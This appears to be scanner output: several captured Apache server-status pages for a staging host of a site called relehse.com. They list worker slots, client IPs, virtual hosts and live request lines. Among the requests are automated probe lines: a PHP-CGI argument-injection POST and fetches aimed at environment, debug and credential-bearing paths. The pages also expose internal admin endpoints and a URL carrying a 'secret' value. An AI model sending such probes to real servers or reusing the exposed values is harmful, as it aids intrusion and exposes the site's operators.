172.68.23.91h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/411/7428_ 33.118139325833410.019.56334.24 172.68.23.91h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 2-7633102610/417/7278_ 33.3540124890820.06.96264.66 185.247.137.68h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/415/7594_ 33.371032050120.08.28232.05 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-7633102610/447/7189_ 33.362037039830.028.76241.70 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-7633102610/435/7400_ 33.353130430470.07.47244.70 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-7633102610/460/7402_ 33.128142655510150.07.87269.07 172.68.23.91h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/283/10725_ 29.3650034379110.07.13351.97 172.68.230.131h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/305/10467_ 29.635662134258330.07.17343.74 162.158.42.195h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/287/10989_ 29.34556032091870.04.43333.21 172.68.230.157h2tandemsl.com:443idle, streams: 0/7/7/0/0 (open/recv/resp/push/rst) 3-7633102640/308/10388_ 29.34556135594870.04.11305.40 172.68.230.157h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/305/10502_ 29.3551038219580.06.43346.39 172.68.230.157h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/301/10685_ 28.9681043328726450.05.68328.20 104.23.168.65h2tandemsl.com:443done, streams: 0/9/9/0/0 (open/recv/resp/push/rst) 3-7633102640/296/10630_ 29.34807025006780.05.15375.72 172.68.230.157h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/304/10968_ 29.34810093567070.07.05311.84 172.68.230.157h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-7633102640/281/10325_ 29.455611738949350.015.32328.10 162.158.120.219h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/282/11442_ 29.34807051243890.04.30356.06 172.68.230.157h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 4-7633103970/594/8091_ 45.38629059980680.016.53307.93 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 4-7633103970/631/7663_ 45.28825042857730.010.73269.18 172.68.150.14h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-7633103970/621/8197_ 45.40573034512750.010.58269.21 209.97.180.8http/1.1relehse.com:443GET /login.action HTTP/1.1 4-7633103970/612/8379_ 45.28820039484790.044.70311.63 172.68.150.46h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-7633103970/617/8083_ 45.28570032215530.017.33226.86 172.68.150.14h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-7633103970/651/7775_ 45.53152419<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27cd7f7c8a
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 26-Sep-2025 09:47:05 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 77 Parent Server MPM Generation: 76 Server uptime: 13 days 20 hours 26 minutes 2 seconds Server load: 0.44 0.66 0.70 Total accesses: 467381 - Total Traffic: 14.6 GB - Total Duration: 180592394 CPU Usage: u89.17 s71.65 cu2321.67 cs1273.37 - .314% CPU load .391 requests/sec - 12.8 kB/second - 32.6 kB/request - 386.392 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03310262no0yes010000 13310263no1yes010000 23310261no2yes19000 33310264no0yes010000 43310397no0yes010000 Sum503 149000 ____________________W_____________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-7633102620/58/9455_ 12.09459541607340.00.99266.10 172.68.102.183h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-7633102620/63/9322_ 12.210053284400.016.46283.56 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-7633102620/109/9819_ 12.201038949600.01.72372.68 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-7633102620/56/9435_ 11.762031685960.00.80288.68 165.227.173.41http/1.1 0-7633102620/63/9638_ 12.081032900180.00.86303.04 172.68.103.54h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-7633102620/55/9923_ 12.191047291180.02.64358.93 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-7633102620/57/9717_ 12.073343676760.01.55230.19 165.227.173.41http/1.1 0-7633102620/99/9499_ 12.194131709510.01.15288.21 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-7633102620/81/9637_ 12.163043400390.02.80288.42 165.227.173.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-7633102620/62/9380_ 12.211039666290.02.37320.67 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-7633102630/15/11132_ 9.4329026708620.00.10283.78 172.69.43.231h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/19/11623_ 9.6229032883350.00.10364.71 162.158.122.29h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/18/11253_ 9.4056025919230.00.36297.80 172.70.162.207h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/19/11123_ 9.4216028747860.02.15300.92 172.70.91.52h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/23/11607_ 9.5416025802450.00.12302.77 172.68.103.122h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/18/12145_ 9.62376829915750.00.21389.74 165.227.173.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-7633102630/25/11680_ 9.63171647185670.00.53385.78 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 1-7633102630/13/12117_ 9.592425224038900.00.08363.91 172.71.223.109h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-7633102630/20/10678_ 9.5656029889050.00.85290.20 172.68.103.161h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/21/11619_ 9.592448822181830.00.34246.50 172.71.223.109h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/48/7052W 11.260032198720.00.71194.63 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-7633102610/71/6718_ 11.300024342290.01.26257.00 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-7633102610/66/7145_ 11.23040419078080.01.24264.29 165.227.173.41http/1.1 2-7633102610/50/6882_ 11.302043444560.01.27267.79 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-7633102610/44/7061_ 11.27027624700090.013.43328.11 162.158.122.164h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-7633102610/54/6915_ 11.27231823740900.02.06259.77 172.64.236.191h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/51/7230_ 11.300030879490.01.46225.23 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-7633102610/51/6793_ 11.26219630807670.01.86214.81 165.227.173.41http/1.1 2-7633102610/55/7020_ 11.301026763400.00.87238.11 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-7633102610/58/7000_ 11.300046497300.01.80263.00 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-7633102640/265/10707_ 21.183134357830.06.63351.47 165.227.173.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-7633102640/268/10430_ 21.15178034219770.06.84343.41 172.70.108.21h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/254/10956_ 21.1617825032077950.04.20332.98 162.158.120.219h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/281/10361_ 21.18178035571050.03.93305.22 141.101.98.83h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/276/10473_ 21.31178038177430.05.31345.28 172.68.102.32h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/275/10659_ 21.29179028658680.04.74327.26 172.68.103.131h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/273/10607_ 21.31178024621380.04.97375.55 172.68.103.145h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/284/10948_ 21.12178593522490.05.64310.43 172.68.103.73h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/256/10300_ 21.31178038923520.014.96327.75 172.68.103.22h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/267/11427_ 21.30178051216640.04.21355.98 172.68.103.150h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-7633103970/569/8066_ 37.11148059915870.016.10307.50 172.68.103.71h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-7633103970/610/7642_ 37.08102042808160.010.18268.63 172.68.103.52h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-7633103970/594/8170_ 36.91143034468950.09.89268.52 162.158.216.144h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-7633103970/593/8360_ 37.09175039462890.043.75310.68 172.68.103.55h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-7633103970/593/8059_ 37.0997732167480.015.23224.75 172.68.103.55h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-7633103970/622/7746_ 37.0897042966400.038.37330.12 172.68.102.112h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/r
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b270bf132ae
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 24-Sep-2025 16:53:19 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 69 Parent Server MPM Generation: 68 Server uptime: 12 days 3 hours 32 minutes 16 seconds Server load: 0.79 0.61 0.55 Total accesses: 417404 - Total Traffic: 12.3 GB - Total Duration: 160508723 CPU Usage: u74.99 s64.79 cu2031.95 cs1118.42 - .313% CPU load .398 requests/sec - 12.3 kB/second - 30.9 kB/request - 384.54 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01148215no0yes010000 11148216no1yes010000 21148214no0yes010000 31148213no2yes19000 41148347no0yes010000 Sum503 149000 _______________________________W__________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-6811482150/28/8500_ 8.571461730357480.00.96213.86 87.58.69.14http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6811482150/37/8322_ 9.2115134550836900.01.85235.37 104.23.209.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6811482150/31/8794_ 8.921251736239550.030.12346.97 87.58.69.14http/1.1relehse.com:443GET /admin/requirements/286068/showNoticeEvaluateds?draw=1&colu 0-6811482150/27/8454_ 8.581781328995500.01.11256.10 87.58.69.14http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 0-6811482150/37/8652_ 9.201251228155920.01.70212.20 152.53.239.248http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6811482150/35/8920_ 9.23129040718690.01.80270.08 152.53.239.248http/1.1cinre.tandemhse.com:443GET / HTTP/1.1 0-6811482150/22/8718_ 8.581291241048780.00.93172.39 87.58.69.14http/1.1relehse.com:443GET /admin/masters/module-icons HTTP/1.1 0-6811482150/28/8443_ 9.231302129285870.01.08263.27 162.158.120.218h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6811482150/25/8659_ 9.19146040623410.00.59238.57 162.158.123.58h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6811482150/24/8410_ 8.581297237102210.00.45278.82 87.58.69.14http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6811482160/259/10724_ 18.37901625431290.05.71254.16 209.206.24.192h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6811482160/265/11167_ 18.41172031748290.05.55358.26 87.58.86.111http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 1-6811482160/251/10823_ 18.3512024665770.04.34266.93 172.70.126.97h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6811482160/249/10720_ 18.191225627622390.03.82282.13 80.36.13.89h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6811482160/281/11184_ 18.3771024447790.015.15261.60 172.69.58.220h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6811482160/294/11689_ 18.26851928657210.07.51362.01 87.58.86.111http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 1-6811482160/250/11268_ 18.3871845939100.03.93320.78 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 1-6811482160/278/11701_ 18.339080522968340.058.56327.48 83.40.204.80http/1.1excel.tandemhse.com:80GET /lcf/index_lcf.php?secret=YWlzIHNlY3MgbWFpIGNvdWVu&view=ofe 1-6811482160/251/10256_ 18.20851928582560.05.61266.24 152.53.239.248http/1.1cinre-backend.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6811482160/274/11194_ 18.357145221062780.03.20221.82 172.71.254.52h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/58/6657_ 10.65548031145330.01.58186.82 172.69.65.142h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/60/6343_ 10.53548423086520.01.15227.35 87.58.69.14http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/67/6772_ 11.154253017998260.01.85214.03 172.64.236.5h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/47/6530_ 10.53420142582120.02.42238.47 87.58.69.14http/1.1relehse.com:443GET /admin_layout/bootstrap/js/bootstrap.min.js HTTP/1.1 2-6811482140/67/6725_ 10.764192023451200.02.71286.61 162.158.120.219h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/58/6507_ 10.74420022471990.01.15227.45 152.53.239.248http/1.1cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/56/6847_ 11.183711429511890.01.58217.48 162.158.120.219h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/52/6469_ 10.42366029878650.01.45142.87 172.64.238.36h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/70/6629_ 11.113663425604460.02.05185.60 162.158.123.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/71/6627_ 11.16419045359590.02.25233.77 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 3-6811482130/582/9069_ 26.520029509090.010.06289.45 68.183.9.16h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-6811482130/500/8795W 26.550029014980.022.62303.55 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-6811482130/492/9213_ 26.570027115280.015.47250.26 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-6811482130/508/8790_ 26.570030954250.016.09269.67 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-6811482130/487/8845_ 26.550033164350.011.52260.41 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-6811482130/494/9004_ 26.560024131710.07.31253.39 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-6811482130/495/8933_ 26.530219759930.08.72336.79 68.183.9.16h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-6811482130/562/9309_ 26.5302888816640.010.78283.93 68.183.9.16http/1.1 3-6811482130/476/8673_ 26.560020862100.09.08248.96 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-6811482130/524/9836_ 26.560044830900.011.90321.48 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-6811483470/110/6565_ 12.862062047221530.02.85242.37 152.53.239.248http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-6811483470/96/6045_ 12.896244835219110.02.99237.30 87.58.69.14http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-6811483470/94/6663_ 12.672433730186530.01.47232.66 87.58.69.14http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 4-6811483470/113/6734_ 12.86624032540300.02.45219.01 87.58.69.14http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 4-6811483470/101/6472_ 12.89243727480410.02.70166.55 87.58.69.14http/1.1relehse.com:443POST /admin/documents/list-document HTTP/1.1 4-6811483470/103/6155_ 13.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b2783fb0896
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 24-Sep-2025 15:55:06 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 69 Parent Server MPM Generation: 68 Server uptime: 12 days 2 hours 34 minutes 3 seconds Server load: 0.22 0.34 0.35 Total accesses: 416056 - Total Traffic: 12.3 GB - Total Duration: 160206998 CPU Usage: u68.34 s60.78 cu2031.95 cs1118.42 - .314% CPU load .398 requests/sec - 12.3 kB/second - 31.0 kB/request - 385.061 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01148215no0yes010000 11148216no2yes010001 21148214no0yes010000 31148213no1yes19000 41148347no0yes010000 Sum503 149001 _____________________________________W____________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-6811482150/25/8497_ 7.991831230357040.00.94213.84 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 0-6811482150/31/8316_ 7.7223717250829790.01.43234.95 87.58.86.111http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 0-6811482150/28/8791_ 7.702421036239350.030.10346.95 87.58.86.111http/1.1relehse.com:443POST /admin/documents/list-document HTTP/1.1 0-6811482150/25/8452_ 6.9023721328995360.01.10256.09 172.71.12.137h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6811482150/31/8646_ 8.050028141390.01.65212.15 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-6811482150/30/8915_ 7.8218347240718370.01.78270.05 172.70.127.133h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6811482150/19/8715_ 7.97242041048630.00.78172.24 162.158.122.113h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6811482150/24/8439_ 7.78183029284720.01.05263.25 172.69.9.105h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6811482150/22/8656_ 7.7023420340617960.00.56238.55 44.225.140.199http/1.1 0-6811482150/21/8407_ 7.21613037089810.00.40278.76 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 1-6811482160/201/10666_ 15.391025274210.04.75253.20 64.225.75.246h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-6811482160/219/11121_ 15.420031685350.05.13357.84 64.225.75.246http/1.1 1-6811482160/207/10779_ 15.450024542580.03.75266.34 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-6811482160/212/10683_ 15.4101127496850.02.84281.15 64.225.75.246h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-6811482160/236/11139_ 15.430024379760.014.57261.02 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-6811482160/242/11637_ 15.430028541240.06.12360.63 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-6811482160/196/11214_ 15.431045727450.02.85319.70 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-6811482160/197/11620_ 15.291022864240.057.49326.41 64.225.75.246http/1.1 1-6811482160/199/10204_ 15.35172528450750.04.82265.44 104.23.245.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6811482160/219/11139_ 15.37066820985070.02.73221.34 64.225.75.246h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-6811482140/57/6656_ 9.87707031145320.01.58186.82 188.114.102.210h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/58/6341_ 9.88707023086470.01.13227.33 172.69.68.41h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/65/6770_ 9.88706017997630.01.84214.03 172.70.216.191h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/46/6529_ 9.89706042582100.02.41238.46 172.69.9.45h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/65/6723_ 10.033031423450780.02.71286.60 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 2-6811482140/55/6504_ 9.88706022471930.01.13227.43 172.69.68.98h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/54/6845_ 9.88303229511560.01.51217.42 172.69.68.147h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/51/6468_ 9.88303129878640.01.15142.58 172.70.216.120h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6811482140/69/6628_ 9.822344225603770.02.05185.60 44.225.140.199http/1.1 2-6811482140/69/6625_ 9.89706045359580.02.24233.76 172.69.9.87h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6811482130/512/8999_ 22.670029328710.09.03288.41 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-6811482130/435/8730_ 22.670028829350.021.13302.05 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-6811482130/417/9138_ 22.670026890280.014.27249.06 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-6811482130/435/8717_ 22.58050530771800.014.22267.79 64.225.75.246h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-6811482130/410/8768_ 22.6111833008770.09.94258.83 80.67.100.226h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6811482130/426/8936_ 22.671124046990.06.46252.54 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-6811482130/420/8858_ 22.6401019584180.07.39335.46 80.67.100.226h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6811482130/469/9216W 22.610088563510.09.46282.62 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-6811482130/415/8612_ 22.6511220671860.07.45247.33 64.225.75.246http/1.1 3-6811482130/444/9756_ 22.670044725800.010.77320.35 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 4-6811483470/107/6562_ 11.754241647221310.02.84242.36 87.58.86.111http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 4-6811483470/93/6042_ 11.82242035206840.02.95237.26 162.158.122.127h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-6811483470/92/6661_ 11.682342830173500.01.43232.63 44.225.140.199http/1.1 4-6811483470/111/6732_ 11.68242171732539730.02.43218.99 87.58.86.111http/1.1relehse.com:443POST /admin/evaluated/tree HTTP/1.1 4-6811483470/99/6470_ 11.682374327480150.02.69166.53 87.58.86.111http/1.1relehse.com:443POST /admin/evaluated/modal HTTP/1.1 4-6811483470/99/6151_ 11.66233735612630.00.90274.88 44.225.140.199http/1.1 4-6811483470/109/6937_ 11.6823713840845300.014.67211.32 87.58.86.111http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/rec
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27f8c2b55b
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 24-Sep-2025 09:27:57 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 67 Parent Server MPM Generation: 66 Server uptime: 11 days 20 hours 6 minutes 54 seconds Server load: 0.27 0.44 0.42 Total accesses: 407287 - Total Traffic: 11.9 GB - Total Duration: 158002637 CPU Usage: u52.88 s50.44 cu2001.61 cs1101.05 - .313% CPU load .398 requests/sec - 12.2 kB/second - 30.7 kB/request - 387.939 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02136923no0yes010000 12136924no1yes010000 22136922no0yes010000 32136921no1yes010000 42137054no1yes19000 Sum503 149000 _________________________________________________W Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-6621369230/11/8470_ 5.0352030327610.00.14212.90 172.68.92.202h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6621369230/7/8282_ 5.0357050805860.00.67233.51 172.68.92.202h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6621369230/5/8760_ 3.9853036226770.00.03316.61 172.64.209.60h2tandemsl.com:443done, streams: 